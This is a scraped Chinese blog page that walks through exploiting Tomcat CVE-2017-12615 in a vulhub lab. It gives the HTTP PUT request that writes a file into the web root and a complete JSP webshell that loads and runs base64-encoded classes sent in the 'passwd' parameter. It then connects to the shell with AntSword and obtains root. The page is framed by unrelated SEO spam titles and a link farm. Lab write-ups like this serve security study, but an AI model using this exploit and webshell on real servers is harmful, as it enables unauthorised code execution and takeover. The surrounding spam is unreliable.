当前位置: 首页 > news >正文

jk制服怎么定制seo的优化策略有哪些

jk制服怎么定制,seo的优化策略有哪些,装潢设计费用,专业做图片制作网站有哪些Tomcat 任意写文件PUT方法 (CVE-2017-12615) 文章目录 Tomcat 任意写文件PUT方法 (CVE-2017-12615)1 在线漏洞解读:2 版本影响3 环境搭建4 漏洞复现4.1 访问4.2 POC攻击点4.2.1 直接发送以下数据包,然后shell将被写入Web根目录。4.2.2 访问是否通,可以访…

Tomcat 任意写文件PUT方法 (CVE-2017-12615)

文章目录

    • Tomcat 任意写文件PUT方法 (CVE-2017-12615)
      • 1 在线漏洞解读:
      • 2 版本影响
      • 3 环境搭建
      • 4 漏洞复现
        • 4.1 访问
        • 4.2 POC攻击点
          • 4.2.1 直接发送以下数据包,然后shell将被写入Web根目录。
          • 4.2.2 访问是否通,可以访问到文件
      • 5 漏洞利用
        • 5.1 上传jsp一句话
        • 5.2 kali打开蚁剑:
        • 5.3 连接jsp一句话木马,密码为 passwd
        • 5.4 打开终端,获取root

1 在线漏洞解读:

https://vulhub.org/#/environments/tomcat/CVE-2017-12615/

在这里插入图片描述

2 版本影响

​ Tomcat version: 8.5.19

3 环境搭建

cd /home/kali/vulhub/tomcat/CVE-2017-12615

在这里插入图片描述

环境启动:

sudo docker-compose up -dsudo docker ps -a

已启动:访问端口8091

在这里插入图片描述

4 漏洞复现

4.1 访问

​ 4.1 访问http://192.168.225.166:8091/看到Tomcat示例页面,发现8.5.19版本后台管理是不允许登录的

在这里插入图片描述
在这里插入图片描述

4.2 POC攻击点
4.2.1 直接发送以下数据包,然后shell将被写入Web根目录。
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5shell
4.2.2 访问是否通,可以访问到文件

在这里插入图片描述

5 漏洞利用

5.1 上传jsp一句话
<%!class U extends ClassLoader {U(ClassLoader c) {super(c);}public Class g(byte[] b) {return super.defineClass(b, 0, b.length);}}public byte[] base64Decode(String str) throws Exception {try {Class clazz = Class.forName("sun.misc.BASE64Decoder");return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);} catch (Exception e) {Class clazz = Class.forName("java.util.Base64");Object decoder = clazz.getMethod("getDecoder").invoke(null);return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);}}
%>
<%String cls = request.getParameter("passwd");if (cls != null) {new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);}
%>
5.2 kali打开蚁剑:
┌──(kali💋kali)-[~]
└─$ sudo antsword 
5.3 连接jsp一句话木马,密码为 passwd

在这里插入图片描述

5.4 打开终端,获取root

在这里插入图片描述

http://www.zhongyajixie.com/news/54377.html

相关文章:

  • 自己做名片的网站参考消息今天新闻
  • 做网站需要学习编程吗nba今日最新消息
  • 网站建设 教程百度竞价可以自学吗
  • 网站建设 设计今天上海最新新闻事件
  • 毕业设计做网站做什么好品牌战略
  • 个人做网站名称可以随意更改吗手机网络优化
  • 人力资源外包长沙优化科技有限公司正规吗
  • 南充网站建设选略奥南京seo排名收费
  • flash网站怎么做音乐停止不受国内限制的浏览器下载
  • 呼和浩特企业网站建设油烟机seo关键词
  • google网站怎么做流量谷歌浏览器手机版官网下载
  • wordpress 调用分类佛山百度快速排名优化
  • 辽宁省网站制作域名注册需要哪些条件
  • 网站模版 模板google下载安装
  • 如何看网站有没有备案seo面试常见问题及答案
  • 舆情分析报告案例应用商店优化
  • 网站空间和域名区别工程建设数字化管理平台
  • 成都h5网站建设电脑培训班在哪里有最近的
  • 网站定制哪家比较好友情链接发布平台
  • 江苏省建设局网站证件查询seo关键词排名优化
  • 建设银行公积金提取预约网站武汉seo关键字推广
  • 如何看网站是否有做网站地图网站ui设计
  • 重庆制作网站公司哪家好淮安百度推广公司
  • 怎样去权重高的网站做外链天津百度关键词排名
  • 有哪些做软件的网站有哪些衡阳有实力seo优化
  • 深圳网站建设黄浦网络百度搜索引擎使用技巧
  • 网站设计风格免费站长统计工具
  • 关键词优化除了做网站还有什么方法今日热榜
  • 东城专业网站建设公司如何把一个关键词优化到首页
  • 分类信息网站做推广华为seo诊断及优化分析